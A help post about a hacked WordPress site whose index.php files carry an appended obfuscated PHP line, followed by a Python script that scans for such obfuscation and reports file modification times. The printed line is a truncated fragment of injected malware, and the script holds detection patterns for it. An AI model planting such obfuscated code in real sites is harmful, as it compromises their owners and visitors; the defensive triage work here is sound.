
Corrupted index.php file in root and wp-admin

I am managing a few WordPress websites for a consumer. Abruptly one of the websites stopped working and was throwing a 500 error (Unable to deal with the request). Because index.php would be the primary file that gets executed, I happened to open the file to take a look and found the following encoded text appended to the index.php file under the root and also inside wp-admin.

$OO0__00_OO=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54>

Full file:

<?php
$OO0__00_OO=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54>
?>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';

All of the files have 644 and folders have 755 permissions. The whole website is hosted in AWS and we have a WAF which has the PHP and WordPress default rules. I am trying to determine how to see how the penetration occurs and how the index.php is being amended.
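
A triage sketch for the pattern shown in the post, added here as an example and not part of the original post: it flags PHP files carrying the same markers as the injected line (a variable named only with O, 0 and _, and urldecode() over a long run of %xx escapes) and reports each file's modification time so it can be correlated with web server access logs. The function names, thresholds and embedded samples are assumptions constructed for illustration.

```python
import re
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# Variable named only with O, 0 and _ (as in the sample on this page).
OBFUSCATED_VAR = re.compile(r"\$[O0_]{6,}\s*=")
# urldecode() fed a long run of %xx escapes, i.e. a hidden lookup alphabet.
ENCODED_ALPHABET = re.compile(r"urldecode\(\s*[\"'](?:%[0-9A-Fa-f]{2}){16,}")
# A closed PHP block placed in front of the file's real opening tag.
PREPENDED_BLOCK = re.compile(r"\A\s*<\?php\b.*?\?>\s*<\?php\b", re.DOTALL)

def inspect_php(source: str) -> list[str]:
    """Return the names of the indicators present in one PHP source string."""
    checks = [("obfuscated-variable", OBFUSCATED_VAR),
              ("urldecode-alphabet", ENCODED_ALPHABET),
              ("prepended-block", PREPENDED_BLOCK)]
    return [name for name, rx in checks if rx.search(source)]

def scan_tree(root: str) -> dict[str, dict]:
    """Scan every *.php under root; keep files with an obfuscation indicator."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        found = inspect_php(path.read_text(errors="replace"))
        # prepended-block alone is common in templates: require a second signal
        if set(found) - {"prepended-block"}:
            mtime = datetime.fromtimestamp(path.stat().st_mtime, timezone.utc)
            report[str(path.relative_to(root))] = {
                "findings": found, "modified_utc": mtime.isoformat()}
    return report

# Constructed samples: a shortened copy of the injected line, and a clean stub.
CLEAN = ("<?php\ndefine( 'WP_USE_THEMES', true );\n"
         "require __DIR__ . '/wp-blog-header.php';\n")
INJECTED = ('<?php\n$OO0__00_OO=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35'
            '%5f%4a%55%74%52%78%49%59");\n?>\n' + CLEAN)

def demo() -> dict[str, dict]:
    """Build a throwaway tree with one injected and one clean file, scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "wp-admin").mkdir()
        (Path(tmp) / "index.php").write_text(INJECTED)
        (Path(tmp) / "wp-admin" / "index.php").write_text(CLEAN)
        return scan_tree(tmp)

if __name__ == "__main__":
    for name, info in demo().items():
        print(name, info["modified_utc"], ", ".join(info["findings"]))
```

For WordPress core files such as the two named in the post, `wp core verify-checksums` (WP-CLI) compares every core file against the official checksums and catches modifications that this pattern match would miss.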